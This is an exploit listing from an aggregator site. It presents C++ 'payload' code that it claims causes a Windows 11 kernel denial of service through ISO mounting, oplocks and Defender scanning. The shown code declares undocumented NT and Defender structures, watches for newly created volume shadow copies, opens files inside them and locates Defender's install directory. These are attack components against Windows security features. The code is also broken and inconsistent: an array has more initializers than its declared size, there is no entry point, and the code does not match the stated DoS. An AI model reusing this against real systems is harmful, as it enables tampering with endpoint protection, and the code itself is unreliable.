Share
## https://sploitus.com/exploit?id=PACKETSTORM:223817
==================================================================================================================================
| # Title : Windows Kernel Logical Denial of Service via ISO Mount + Oplock Deserialization |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 151.0.3 (64 bits) |
| # Vendor : Windows 11 25H2 (Build 26200) and later |
==================================================================================================================================
[+] Summary : A Logical Denial of Service (LDoS) vulnerability in Windows 11 25H2 (Build 26200) that causes permanent kernel state corruption through ISO mounting, oplocks, and Windows Defender scanning.
[+] Payload :
#define _CRT_SECURE_NO_WARNINGS
#define _WIN32_DCOM
#include <iostream>
#include <Windows.h>
#include <Psapi.h>
#include <winternl.h>
#include <conio.h>
#include <ntstatus.h>
#include <virtdisk.h>
#include <shlwapi.h>
#include <initguid.h>
#include <ole2.h>
#include <comdef.h>
#include <taskschd.h>
#include <bcrypt.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#pragma comment(lib, "kernel32.lib")
#pragma comment(lib, "bcrypt.lib")
#pragma comment(lib, "taskschd.lib")
#pragma comment(lib, "comsupp.lib")
#pragma comment(lib, "virtdisk.lib")
#pragma comment(lib, "ntdll.lib")
#pragma comment(lib, "Rpcrt4.lib")
#pragma comment(lib, "shlwapi.lib")
wchar_t zippath[MAX_PATH] = { 0 };
HMODULE ntdllhm = NULL;
HANDLE g_poseidonevent = NULL;
bool g_poseidonexit = false;
char g_poseidonbuf[0x1000] = { 0 };
unsigned char rawData[2] = {
0x00, 0x00, 0x00, 0x00, 0x00, 0x00
};
NTSTATUS(WINAPI* _NtSetInformationFile)(
HANDLE FileHandle,
PIO_STATUS_BLOCK IoStatusBlock,
PVOID FileInformation,
ULONG Length,
FILE_INFORMATION_CLASS FileInformationClass
) = NULL;
NTSTATUS(WINAPI* _NtDeleteFile)(
_In_ POBJECT_ATTRIBUTES ObjectAttributes
) = NULL;
NTSTATUS(WINAPI* _NtOpenDirectoryObject)(
PHANDLE DirectoryHandle,
ACCESS_MASK DesiredAccess,
POBJECT_ATTRIBUTES ObjectAttributes
) = NULL;
NTSTATUS(WINAPI* _NtQueryDirectoryObject)(
HANDLE DirectoryHandle,
PVOID Buffer,
ULONG Length,
BOOLEAN ReturnSingleEntry,
BOOLEAN RestartScan,
PULONG Context,
PULONG ReturnLength
) = NULL;
NTSTATUS(WINAPI* _NtQueryInformationFile)(
HANDLE FileHandle,
PIO_STATUS_BLOCK IoStatusBlock,
PVOID FileInformation,
ULONG Length,
FILE_INFORMATION_CLASS FileInformationClass
) = NULL;
#define RtlOffsetToPointer(Base, Offset) ((PUCHAR)(((PUCHAR)(Base)) + ((ULONG_PTR)(Offset))))
namespace custom_defs {
typedef enum _SYSTEM_INFORMATION_CLASS {
SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemPathInformation,
SystemProcessInformation,
SystemCallCountInformation,
SystemDeviceInformation,
SystemProcessorPerformanceInformation,
SystemFlagsInformation,
SystemCallTimeInformation,
SystemModuleInformation,
SystemLocksInformation,
SystemStackTraceInformation,
SystemPagedPoolInformation,
SystemNonPagedPoolInformation,
SystemHandleInformation,
SystemObjectInformation,
SystemPageFileInformation,
SystemVdmInstemulInformation,
SystemVdmBopInformation,
SystemFileCacheInformation,
SystemPoolTagInformation,
SystemInterruptInformation,
SystemDpcBehaviorInformation,
SystemFullMemoryInformation,
SystemLoadGdiDriverInformation,
SystemUnloadGdiDriverInformation,
SystemTimeAdjustmentInformation,
SystemSummaryMemoryInformation,
SystemMirrorMemoryInformation,
SystemPerformanceTraceInformation,
SystemObsolete0,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegistryQuotaInformation,
SystemExtendServiceTableInformation,
SystemPrioritySeparation,
SystemVerifierAddDriverInformation,
SystemVerifierRemoveDriverInformation,
SystemProcessorIdleInformation,
SystemLegacyDriverInformation,
SystemCurrentTimeZoneInformation,
SystemLookasideInformation,
SystemTimeSlipNotification,
SystemSessionCreate,
SystemSessionDetach,
SystemSessionInformation,
SystemRangeStartInformation,
SystemVerifierInformation,
SystemVerifierThunkExtend,
SystemSessionProcessInformation,
SystemLoadGdiDriverInSystemSpace,
SystemNumaProcessorMap,
SystemPrefetcherInformation,
SystemExtendedProcessInformation,
SystemRecommendedSharedDataAlignment,
SystemComPlusPackage,
SystemNumaAvailableMemory,
SystemProcessorPowerInformation,
SystemEmulationBasicInformation,
SystemEmulationProcessorInformation,
SystemExtendedHandleInformation,
SystemLostDelayedWriteInformation,
SystemBigPoolInformation,
SystemSessionPoolTagInformation,
SystemSessionMappedViewInformation,
SystemHotpatchInformation,
SystemObjectSecurityMode,
SystemWatchdogTimerHandler,
SystemWatchdogTimerInformation,
SystemLogicalProcessorInformation,
SystemWow64SharedInformationObsolete,
SystemRegisterFirmwareTableInformationHandler,
SystemFirmwareTableInformation,
SystemModuleInformationEx,
SystemVerifierTriageInformation,
SystemSuperfetchInformation,
SystemMemoryListInformation,
SystemFileCacheInformationEx,
SystemThreadPriorityClientIdInformation,
SystemProcessorIdleCycleTimeInformation,
SystemVerifierCancellationInformation,
SystemProcessorPowerInformationEx,
SystemRefTraceInformation,
SystemSpecialPoolInformation,
SystemProcessIdInformation,
SystemErrorPortInformation,
SystemBootEnvironmentInformation,
SystemHypervisorInformation,
SystemVerifierInformationEx,
SystemTimeZoneInformation,
SystemImageFileExecutionOptionsInformation,
SystemCoverageInformation,
SystemPrefetchPatchInformation,
SystemVerifierFaultsInformation,
SystemSystemPartitionInformation,
SystemSystemDiskInformation,
SystemProcessorPerformanceDistribution,
SystemNumaProximityNodeInformation,
SystemDynamicTimeZoneInformation,
SystemCodeIntegrityInformation,
SystemProcessorMicrocodeUpdateInformation,
SystemProcessorBrandString,
SystemVirtualAddressInformation,
SystemLogicalProcessorAndGroupInformation,
SystemProcessorCycleTimeInformation,
SystemStoreInformation,
SystemRegistryAppendString,
SystemAitSamplingValue,
SystemVhdBootInformation,
SystemCpuQuotaInformation,
SystemNativeBasicInformation,
SystemErrorPortTimeouts,
SystemLowPriorityIoInformation,
SystemTpmBootEntropyInformation,
SystemVerifierCountersInformation,
SystemPagedPoolInformationEx,
SystemSystemPtesInformationEx,
SystemNodeDistanceInformation,
SystemAcpiAuditInformation,
SystemBasicPerformanceInformation,
SystemQueryPerformanceCounterInformation,
SystemSessionBigPoolInformation,
SystemBootGraphicsInformation,
SystemScrubPhysicalMemoryInformation,
SystemBadPageInformation,
SystemProcessorProfileControlArea,
SystemCombinePhysicalMemoryInformation,
SystemEntropyInterruptTimingInformation,
SystemConsoleInformation,
SystemPlatformBinaryInformation,
SystemPolicyInformation,
SystemHypervisorProcessorCountInformation,
SystemDeviceDataInformation,
SystemDeviceDataEnumerationInformation,
SystemMemoryTopologyInformation,
SystemMemoryChannelInformation,
SystemBootLogoInformation,
SystemProcessorPerformanceInformationEx,
SystemCriticalProcessErrorLogInformation,
SystemSecureBootPolicyInformation,
SystemPageFileInformationEx,
SystemSecureBootInformation,
SystemEntropyInterruptTimingRawInformation,
SystemPortableWorkspaceEfiLauncherInformation,
SystemFullProcessInformation,
SystemKernelDebuggerInformationEx,
SystemBootMetadataInformation,
SystemSoftRebootInformation,
SystemElamCertificateInformation,
SystemOfflineDumpConfigInformation,
SystemProcessorFeaturesInformation,
SystemRegistryReconciliationInformation,
SystemEdidInformation,
SystemManufacturingInformation,
SystemEnergyEstimationConfigInformation,
SystemHypervisorDetailInformation,
SystemProcessorCycleStatsInformation,
SystemVmGenerationCountInformation,
SystemTrustedPlatformModuleInformation,
SystemKernelDebuggerFlags,
SystemCodeIntegrityPolicyInformation,
SystemIsolatedUserModeInformation,
SystemHardwareSecurityTestInterfaceResultsInformation,
SystemSingleModuleInformation,
SystemAllowedCpuSetsInformation,
SystemVsmProtectionInformation,
SystemInterruptCpuSetsInformation,
SystemSecureBootPolicyFullInformation,
SystemCodeIntegrityPolicyFullInformation,
SystemAffinitizedInterruptProcessorInformation,
SystemRootSiloInformation,
SystemCpuSetInformation,
SystemCpuSetTagInformation,
SystemWin32WerStartCallout,
SystemSecureKernelProfileInformation,
SystemCodeIntegrityPlatformManifestInformation,
SystemInterruptSteeringInformation,
SystemSupportedProcessorArchitectures,
SystemMemoryUsageInformation,
SystemCodeIntegrityCertificateInformation,
SystemPhysicalMemoryInformation,
SystemControlFlowTransition,
SystemKernelDebuggingAllowed,
SystemActivityModerationExeState,
SystemActivityModerationUserSettings,
SystemCodeIntegrityPoliciesFullInformation,
SystemCodeIntegrityUnlockInformation,
SystemIntegrityQuotaInformation,
SystemFlushInformation,
SystemProcessorIdleMaskInformation,
SystemSecureDumpEncryptionInformation,
SystemWriteConstraintInformation,
SystemKernelVaShadowInformation,
SystemHypervisorSharedPageInformation,
SystemFirmwareBootPerformanceInformation,
SystemCodeIntegrityVerificationInformation,
SystemFirmwarePartitionInformation,
SystemSpeculationControlInformation,
SystemDmaGuardPolicyInformation,
SystemEnclaveLaunchControlInformation,
SystemWorkloadAllowedCpuSetsInformation,
SystemCodeIntegrityUnlockModeInformation,
SystemLeapSecondInformation,
SystemFlags2Information,
SystemSecurityModelInformation,
SystemCodeIntegritySyntheticCacheInformation,
SystemFeatureConfigurationInformation,
SystemFeatureConfigurationSectionInformation,
SystemFeatureUsageSubscriptionInformation,
SystemSecureSpeculationControlInformation,
SystemSpacesBootInformation,
SystemFwRamdiskInformation,
SystemWheaIpmiHardwareInformation,
SystemDifSetRuleClassInformation,
SystemDifClearRuleClassInformation,
SystemDifApplyPluginVerificationOnDriver,
SystemDifRemovePluginVerificationOnDriver,
SystemShadowStackInformation,
SystemBuildVersionInformation,
SystemPoolLimitInformation,
SystemCodeIntegrityAddDynamicStore,
SystemCodeIntegrityClearDynamicStores,
SystemDifPoolTrackingInformation,
SystemPoolZeroingInformation,
SystemDpcWatchdogInformation,
SystemDpcWatchdogInformation2,
SystemSupportedProcessorArchitectures2,
SystemSingleProcessorRelationshipInformation,
SystemXfgCheckFailureInformation,
SystemIommuStateInformation,
SystemHypervisorMinrootInformation,
SystemHypervisorBootPagesInformation,
SystemPointerAuthInformation,
SystemSecureKernelDebuggerInformation,
SystemOriginalImageFeatureInformation,
SystemMemoryNumaInformation,
SystemMemoryNumaPerformanceInformation,
SystemCodeIntegritySignedPoliciesFullInformation,
SystemSecureCoreInformation,
SystemTrustedAppsRuntimeInformation,
SystemBadPageInformationEx,
SystemResourceDeadlockTimeout,
SystemBreakOnContextUnwindFailureInformation,
SystemOslRamdiskInformation,
SystemCodeIntegrityPolicyManagementInformation,
SystemMemoryNumaCacheInformation,
SystemProcessorFeaturesBitMapInformation,
SystemRefTraceInformationEx,
SystemBasicProcessInformation,
SystemHandleCountInformation,
SystemRuntimeAttestationReport,
SystemPoolTagInformation2,
SystemCodeIntegrityEndpointSecurityInformation,
MaxSystemInfoClass
} SYSTEM_INFORMATION_CLASS;
typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX {
PVOID Object;
HANDLE UniqueProcessId;
HANDLE HandleValue;
ACCESS_MASK GrantedAccess;
USHORT CreatorBackTraceIndex;
USHORT ObjectTypeIndex;
ULONG HandleAttributes;
ULONG Reserved;
} SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX;
typedef struct _SYSTEM_HANDLE_INFORMATION_EX {
ULONG_PTR NumberOfHandles;
ULONG_PTR Reserved;
_Field_size_(NumberOfHandles) SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1];
} SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX;
typedef enum _FILE_INFORMATION_CLASS {
FileDirectoryInformation = 1,
FileFullDirectoryInformation,
FileBothDirectoryInformation,
FileBasicInformation,
FileStandardInformation,
FileInternalInformation,
FileEaInformation,
FileAccessInformation,
FileNameInformation,
FileRenameInformation,
FileLinkInformation,
FileNamesInformation,
FileDispositionInformation,
FilePositionInformation,
FileFullEaInformation,
FileModeInformation,
FileAlignmentInformation,
FileAllInformation,
FileAllocationInformation,
FileEndOfFileInformation,
FileAlternateNameInformation,
FileStreamInformation,
FilePipeInformation,
FilePipeLocalInformation,
FilePipeRemoteInformation,
FileMailslotQueryInformation,
FileMailslotSetInformation,
FileCompressionInformation,
FileObjectIdInformation,
FileCompletionInformation,
FileMoveClusterInformation,
FileQuotaInformation,
FileReparsePointInformation,
FileNetworkOpenInformation,
FileAttributeTagInformation,
FileTrackingInformation,
FileIdBothDirectoryInformation,
FileIdFullDirectoryInformation,
FileValidDataLengthInformation,
FileShortNameInformation,
FileIoCompletionNotificationInformation,
FileIoStatusBlockRangeInformation,
FileIoPriorityHintInformation,
FileSfioReserveInformation,
FileSfioVolumeInformation,
FileHardLinkInformation,
FileProcessIdsUsingFileInformation,
FileNormalizedNameInformation,
FileNetworkPhysicalNameInformation,
FileIdGlobalTxDirectoryInformation,
FileIsRemoteDeviceInformation,
FileUnusedInformation,
FileNumaNodeInformation,
FileStandardLinkInformation,
FileRemoteProtocolInformation,
FileRenameInformationBypassAccessCheck,
FileLinkInformationBypassAccessCheck,
FileVolumeNameInformation,
FileIdInformation,
FileIdExtdDirectoryInformation,
FileReplaceCompletionInformation,
FileHardLinkFullIdInformation,
FileIdExtdBothDirectoryInformation,
FileDispositionInformationEx,
FileRenameInformationEx,
FileRenameInformationExBypassAccessCheck,
FileDesiredStorageClassInformation,
FileStatInformation,
FileMemoryPartitionInformation,
FileStatLxInformation,
FileCaseSensitiveInformation,
FileLinkInformationEx,
FileLinkInformationExBypassAccessCheck,
FileStorageReserveIdInformation,
FileCaseSensitiveInformationForceAccessCheck,
FileKnownFolderInformation,
FileStatBasicInformation,
FileId64ExtdDirectoryInformation,
FileId64ExtdBothDirectoryInformation,
FileIdAllExtdDirectoryInformation,
FileIdAllExtdBothDirectoryInformation,
FileStreamReservationInformation,
FileMupProviderInfo,
FileMaximumInformation
} FILE_INFORMATION_CLASS, * PFILE_INFORMATION_CLASS;
}
typedef HANDLE MPHANDLE;
typedef HANDLE* PMPHANDLE;
typedef ULONG MPTHREAT_ID;
typedef ULONG MPRESOURCE_CLASS;
typedef LPWSTR MP_MIDL_STRING;
typedef enum tagMPTHREAT_TYPE {
MPTHREAT_TYPE_KNOWNBAD = 0,
MPTHREAT_TYPE_BEHAVIOR = 1,
MPTHREAT_TYPE_UNKNOWN = 2,
MPTHREAT_TYPE_KNOWNGOOD = 3,
MPTHREAT_TYPE_NIS = 4,
MPTHREAT_TYPE_MAXVALUE = 4
} MPTHREAT_TYPE;
typedef enum tagMPTHREAT_SOURCE {
MPTHREAT_SOURCE_SCAN = 0,
MPTHREAT_SOURCE_ACTIVE = 1,
MPTHREAT_SOURCE_HISTORY = 2,
MPTHREAT_SOURCE_QUARANTINE = 3,
MPTHREAT_SOURCE_SIGNATURE = 4,
MPTHREAT_SOURCE_STATE = 5,
MPTHREAT_SOURCE_MAXVALUE = 5
} MPTHREAT_SOURCE;
typedef enum tagMPSCAN_TYPE {
MPSCAN_TYPE_UNKNOWN = 0,
MPSCAN_TYPE_QUICK = 1,
MPSCAN_TYPE_FULL = 2,
MPSCAN_TYPE_RESOURCE = 3,
MPSCAN_TYPE_MAXVALUE = 3
} MPSCAN_TYPE;
typedef enum tagMPTHREAT_ACTION {
MP_THREAT_ACTION_UNKNOWN = 0,
MP_THREAT_ACTION_CLEAN = 1,
MP_THREAT_ACTION_QUARANTINE = 2,
MP_THREAT_ACTION_REMOVE = 3,
MP_THREAT_ACTION_ALLOW = 6,
MP_THREAT_ACTION_USERDEFINED = 8,
MP_THREAT_ACTION_NOACTION = 9,
MP_THREAT_ACTION_BLOCK = 10,
MP_THREAT_ACTION_MAX_VALUE = 10
} MPTHREAT_ACTION;
typedef struct tagMPTHREAT_INFO {
MPTHREAT_ID ThreatID;
GUID DetectionID;
MP_MIDL_STRING Name;
MPTHREAT_TYPE ThreatType;
MPTHREAT_SEVERITY ThreatCriticality;
MPTHREAT_CATEGORY ThreatCategory;
DWORD ThreatShortDescriptionID;
DWORD ThreatAdviseDescriptionID;
MPTHREAT_STATUS ThreatStatus;
DWORD SuggestedActionCount;
MPTHREAT_ACTION SuggestedActionArray[10000];
DWORD ResourceCount;
PVOID ResourceList[1024];
ULARGE_INTEGER ThreatStatusTime;
HRESULT ThreatStatusCode;
DWORD ThreatDetection;
GUID QuarantineGuid;
DWORD ExecutionStatus;
PVOID Data;
DWORD State;
MP_MIDL_STRING DetectionUser;
DWORD DetectionSource;
MP_MIDL_STRING ProcessName;
DWORD DetectionOrigin;
DWORD reserved1;
ULARGE_INTEGER DetectionTime;
DWORD PreExecutionStatus;
ULARGE_INTEGER RemediationTime;
DWORD PostExecutionStatus;
BOOL CriticalFailure;
DWORD NonCriticalReason;
MP_MIDL_STRING RemediationUser;
DWORD RemediationResourceCount;
PVOID RemediationResourceList[1024];
BOOL FailureResolved;
DWORD ResolvedReason;
DWORD AdditionalActions;
DWORD ResolvedActions;
DWORD dwThreatStatusFlag;
} MPTHREAT_INFO, * PMPTHREAT_INFO;
typedef struct tagMPRESOURCE_INFO {
MP_MIDL_STRING Scheme;
MP_MIDL_STRING Path;
MPRESOURCE_CLASS Class;
} MPRESOURCE_INFO, * PMPRESOURCE_INFO;
typedef struct tagMPSCAN_RESOURCES {
DWORD dwResourceCount;
PMPRESOURCE_INFO pResourceList;
} MPSCAN_RESOURCES, * PMPSCAN_RESOURCES;
typedef struct tagMPCALLBACK_INFO {
void* CallbackHandler;
__int64 v4;
} MPCALLBACK_INFO, * PMPCALLBACK_INFO;
typedef struct _FILE_BASIC_INFORMATION {
LARGE_INTEGER CreationTime;
LARGE_INTEGER LastAccessTime;
LARGE_INTEGER LastWriteTime;
LARGE_INTEGER ChangeTime;
ULONG FileAttributes;
} FILE_BASIC_INFORMATION, * PFILE_BASIC_INFORMATION;
typedef struct _FILE_RENAME_INFORMATION {
union {
BOOLEAN ReplaceIfExists;
ULONG Flags;
} DUMMYUNIONNAME;
HANDLE RootDirectory;
ULONG FileNameLength;
WCHAR FileName[1];
} FILE_RENAME_INFORMATION, * PFILE_RENAME_INFORMATION;
typedef struct _REPARSE_DATA_BUFFER {
ULONG ReparseTag;
USHORT ReparseDataLength;
USHORT Reserved;
union {
struct {
USHORT SubstituteNameOffset;
USHORT SubstituteNameLength;
USHORT PrintNameOffset;
USHORT PrintNameLength;
ULONG Flags;
WCHAR PathBuffer[1];
} SymbolicLinkReparseBuffer;
struct {
USHORT SubstituteNameOffset;
USHORT SubstituteNameLength;
USHORT PrintNameOffset;
USHORT PrintNameLength;
WCHAR PathBuffer[1];
} MountPointReparseBuffer;
struct {
UCHAR DataBuffer[1];
} GenericReparseBuffer;
} DUMMYUNIONNAME;
} REPARSE_DATA_BUFFER, * PREPARSE_DATA_BUFFER;
#define REPARSE_DATA_BUFFER_HEADER_LENGTH FIELD_OFFSET(REPARSE_DATA_BUFFER, GenericReparseBuffer.DataBuffer)
#define REPARSE_GUID_DATA_BUFFER_HEADER_SIZE 0x8
typedef struct _FILE_DISPOSITION_INFORMATION_EX {
ULONG Flags;
} FILE_DISPOSITION_INFORMATION_EX, * PFILE_DISPOSITION_INFORMATION_EX;
typedef struct _OBJECT_DIRECTORY_INFORMATION {
UNICODE_STRING Name;
UNICODE_STRING TypeName;
} OBJECT_DIRECTORY_INFORMATION, * POBJECT_DIRECTORY_INFORMATION;
struct LLShadowVolumeNames {
wchar_t* name;
LLShadowVolumeNames* next;
};
void DestroyVSSNamesList(LLShadowVolumeNames* First) {
while (First) {
free(First->name);
LLShadowVolumeNames* next = First->next;
free(First);
First = next;
}
}
LLShadowVolumeNames* RetrieveCurrentVSSList(HANDLE hobjdir, bool* criticalerr, int* vscnumber, DWORD* errorcode) {
if (!criticalerr || !vscnumber || !errorcode)
return NULL;
*vscnumber = 0;
ULONG scanctx = 0;
ULONG reqsz = sizeof(OBJECT_DIRECTORY_INFORMATION) + (UNICODE_STRING_MAX_BYTES * 2);
ULONG retsz = 0;
OBJECT_DIRECTORY_INFORMATION* objdirinfo = (OBJECT_DIRECTORY_INFORMATION*)malloc(reqsz);
if (!objdirinfo) {
printf("[!] Failed to allocate buffer for object manager directory query.\n");
*criticalerr = true;
*errorcode = ERROR_NOT_ENOUGH_MEMORY;
return NULL;
}
ZeroMemory(objdirinfo, reqsz);
NTSTATUS stat = STATUS_SUCCESS;
do {
stat = _NtQueryDirectoryObject(hobjdir, objdirinfo, reqsz, FALSE, FALSE, &scanctx, &retsz);
if (stat == STATUS_SUCCESS)
break;
else if (stat != STATUS_MORE_ENTRIES) {
printf("[!] NtQueryDirectoryObject failed with 0x%0.8X\n", stat);
*criticalerr = true;
*errorcode = RtlNtStatusToDosError(stat);
return NULL;
}
free(objdirinfo);
reqsz += sizeof(OBJECT_DIRECTORY_INFORMATION) + 0x100;
objdirinfo = (OBJECT_DIRECTORY_INFORMATION*)malloc(reqsz);
if (!objdirinfo) {
printf("[!] Failed to allocate required buffer to query object manager directory.\n");
*criticalerr = true;
*errorcode = ERROR_NOT_ENOUGH_MEMORY;
return NULL;
}
ZeroMemory(objdirinfo, reqsz);
} while (1);
void* emptybuff = malloc(sizeof(OBJECT_DIRECTORY_INFORMATION));
ZeroMemory(emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION));
LLShadowVolumeNames* LLVSScurrent = NULL;
LLShadowVolumeNames* LLVSSfirst = NULL;
for (ULONG i = 0; i < ULONG_MAX; i++) {
if (memcmp(&objdirinfo[i], emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION)) == 0) {
free(emptybuff);
break;
}
if (_wcsicmp(L"Device", objdirinfo[i].TypeName.Buffer) == 0) {
wchar_t cmpstr[] = { L"HarddiskVolumeShadowCopy" };
if (objdirinfo[i].Name.Length >= sizeof(cmpstr)) {
if (memcmp(cmpstr, objdirinfo[i].Name.Buffer, sizeof(cmpstr) - sizeof(wchar_t)) == 0) {
(*vscnumber)++;
if (LLVSScurrent) {
LLVSScurrent->next = (LLShadowVolumeNames*)malloc(sizeof(LLShadowVolumeNames));
if (!LLVSScurrent->next) {
printf("[!] Failed to allocate memory.\n");
*criticalerr = true;
*errorcode = ERROR_NOT_ENOUGH_MEMORY;
DestroyVSSNamesList(LLVSSfirst);
free(objdirinfo);
return NULL;
}
ZeroMemory(LLVSScurrent->next, sizeof(LLShadowVolumeNames));
LLVSScurrent = LLVSScurrent->next;
LLVSScurrent->name = (wchar_t*)malloc(objdirinfo[i].Name.Length + sizeof(wchar_t));
if (!LLVSScurrent->name) {
printf("[!] Failed to allocate memory.\n");
*errorcode = ERROR_NOT_ENOUGH_MEMORY;
*criticalerr = true;
DestroyVSSNamesList(LLVSSfirst);
free(objdirinfo);
return NULL;
}
ZeroMemory(LLVSScurrent->name, objdirinfo[i].Name.Length + sizeof(wchar_t));
memmove(LLVSScurrent->name, objdirinfo[i].Name.Buffer, objdirinfo[i].Name.Length);
} else {
LLVSSfirst = (LLShadowVolumeNames*)malloc(sizeof(LLShadowVolumeNames));
if (!LLVSSfirst) {
printf("[!] Failed to allocate memory.\n");
*errorcode = ERROR_NOT_ENOUGH_MEMORY;
*criticalerr = true;
DestroyVSSNamesList(LLVSSfirst);
free(objdirinfo);
return NULL;
}
ZeroMemory(LLVSSfirst, sizeof(LLShadowVolumeNames));
LLVSScurrent = LLVSSfirst;
LLVSScurrent->name = (wchar_t*)malloc(objdirinfo[i].Name.Length + sizeof(wchar_t));
if (!LLVSScurrent->name) {
printf("[!] Failed to allocate memory.\n");
*errorcode = ERROR_NOT_ENOUGH_MEMORY;
*criticalerr = true;
DestroyVSSNamesList(LLVSSfirst);
free(objdirinfo);
return NULL;
}
ZeroMemory(LLVSScurrent->name, objdirinfo[i].Name.Length + sizeof(wchar_t));
memmove(LLVSScurrent->name, objdirinfo[i].Name.Buffer, objdirinfo[i].Name.Length);
}
}
}
}
}
free(objdirinfo);
return LLVSSfirst;
}
DWORD WINAPI ShadowCopyFinderThread(void* fullvsspath) {
wchar_t devicepath[] = L"\\Device";
UNICODE_STRING udevpath = { 0 };
RtlInitUnicodeString(&udevpath, devicepath);
OBJECT_ATTRIBUTES objattr = { 0 };
InitializeObjectAttributes(&objattr, &udevpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
NTSTATUS stat = STATUS_SUCCESS;
HANDLE hobjdir = NULL;
DWORD retval = ERROR_SUCCESS;
wchar_t newvsspath[MAX_PATH] = { 0 };
wcscpy(newvsspath, L"\\Device\\");
bool criterr = false;
int vscnum = 0;
bool restartscan = false;
ULONG scanctx = 0;
ULONG reqsz = sizeof(OBJECT_DIRECTORY_INFORMATION) + (UNICODE_STRING_MAX_BYTES * 2);
ULONG retsz = 0;
OBJECT_DIRECTORY_INFORMATION* objdirinfo = NULL;
bool srchfound = false;
wchar_t vsswinpath[MAX_PATH] = { 0 };
UNICODE_STRING _vsswinpath = { 0 };
OBJECT_ATTRIBUTES objattr2 = { 0 };
IO_STATUS_BLOCK iostat = { 0 };
HANDLE hlk = NULL;
LLShadowVolumeNames* vsinitial = NULL;
stat = _NtOpenDirectoryObject(&hobjdir, 0x0001, &objattr);
if (stat) {
printf("[!] Failed to open object manager directory, error: 0x%0.8X\n", stat);
retval = RtlNtStatusToDosError(stat);
return retval;
}
void* emptybuff = malloc(sizeof(OBJECT_DIRECTORY_INFORMATION));
if (!emptybuff) {
printf("[!] Failed to allocate memory.\n");
retval = ERROR_NOT_ENOUGH_MEMORY;
goto cleanup;
}
ZeroMemory(emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION));
vsinitial = RetrieveCurrentVSSList(hobjdir, &criterr, &vscnum, &retval);
if (criterr) {
printf("[!] Unexpected error while listing current volume shadow copy volumes.\n");
goto cleanup;
}
if (!vsinitial) {
printf("[*] No volume shadow copies were found.\n");
} else {
printf("[*] Found %d volume shadow copies.\n", vscnum);
}
stat = STATUS_SUCCESS;
scanagain:
do {
if (objdirinfo)
free(objdirinfo);
objdirinfo = (OBJECT_DIRECTORY_INFORMATION*)malloc(reqsz);
if (!objdirinfo) {
printf("[!] Failed to allocate required buffer to query object manager directory.\n");
retval = ERROR_NOT_ENOUGH_MEMORY;
goto cleanup;
}
ZeroMemory(objdirinfo, reqsz);
scanctx = 0;
stat = _NtQueryDirectoryObject(hobjdir, objdirinfo, reqsz, FALSE, restartscan, &scanctx, &retsz);
if (stat == STATUS_SUCCESS)
break;
else if (stat != STATUS_MORE_ENTRIES) {
printf("[!] NtQueryDirectoryObject failed with 0x%0.8X\n", stat);
retval = RtlNtStatusToDosError(stat);
goto cleanup;
}
reqsz += sizeof(OBJECT_DIRECTORY_INFORMATION) + 0x100;
} while (1);
for (ULONG i = 0; i < ULONG_MAX; i++) {
if (memcmp(&objdirinfo[i], emptybuff, sizeof(OBJECT_DIRECTORY_INFORMATION)) == 0) {
break;
}
if (_wcsicmp(L"Device", objdirinfo[i].TypeName.Buffer) == 0) {
wchar_t cmpstr[] = { L"HarddiskVolumeShadowCopy" };
if (objdirinfo[i].Name.Length >= sizeof(cmpstr)) {
if (memcmp(cmpstr, objdirinfo[i].Name.Buffer, sizeof(cmpstr) - sizeof(wchar_t)) == 0) {
LLShadowVolumeNames* current = vsinitial;
bool found = false;
while (current) {
if (_wcsicmp(current->name, objdirinfo[i].Name.Buffer) == 0) {
found = true;
break;
}
current = current->next;
}
if (found)
continue;
else {
srchfound = true;
wcscat(newvsspath, objdirinfo[i].Name.Buffer);
break;
}
}
}
}
}
if (!srchfound) {
restartscan = true;
goto scanagain;
}
if (objdirinfo) {
free(objdirinfo);
objdirinfo = NULL;
}
NtClose(hobjdir);
hobjdir = NULL;
printf("[+] New volume shadow copy detected: %ws\n", newvsspath);
wcscpy(vsswinpath, newvsspath);
wcscat(vsswinpath, L"\\Windows");
RtlInitUnicodeString(&_vsswinpath, vsswinpath);
InitializeObjectAttributes(&objattr2, &_vsswinpath, OBJ_CASE_INSENSITIVE, NULL, NULL);
retry:
stat = NtCreateFile(&hlk, FILE_READ_ATTRIBUTES, &objattr2, &iostat, NULL, NULL, NULL, FILE_OPEN, NULL, NULL, NULL);
if (stat == STATUS_NO_SUCH_DEVICE)
goto retry;
if (stat) {
printf("[!] Failed to open volume shadow copy, error: 0x%0.8X\n", stat);
retval = RtlNtStatusToDosError(stat);
goto cleanup;
}
printf("[+] Successfully accessed volume shadow copy.\n");
CloseHandle(hlk);
if (fullvsspath)
wcscpy((wchar_t*)fullvsspath, newvsspath);
cleanup:
if (hobjdir)
NtClose(hobjdir);
if (emptybuff)
free(emptybuff);
if (vsinitial)
DestroyVSSNamesList(vsinitial);
return retval;
}
DWORD MpCleanCallbackFunction() {
printf("[*] MpCleanCallbackFunction called.\n");
return 0;
}
bool GetWDInstallDir(wchar_t* dirname) {
HKEY hkey = NULL;
LSTATUS lstat = RegOpenKeyEx(HKEY_LOCAL_MACHINE, L"SOFTWARE\\Microsoft\\Windows Defender", NULL, KEY_QUERY_VALUE, &hkey);
if (lstat) {
printf("[!] Failed to open Windows Defender registry key, error: %d\n", lstat);
return false;
}
DWORD keytype = REG_SZ;
DWORD datasz = MAX_PATH * sizeof(wchar_t);
lstat = RegQueryValueEx(hkey, L"InstallLocation", NULL, &keytype, (LPBYTE)dirname, &datasz);
if (lstat) {
printf("[!] Failed to query Windows Defender install location, error: %d\n", lstat);
return false;
}
RegCloseKey(hkey);
return true;
}
bool GetWERDir(wchar_t* dirname) {
wchar_t windir[MAX_PATH] = { 0 };
GetWindowsDirectory(windir, MAX_PATH);
wcscpy(dirname, windir);
wcscat(dirname, L"\\System32");
return true;
}
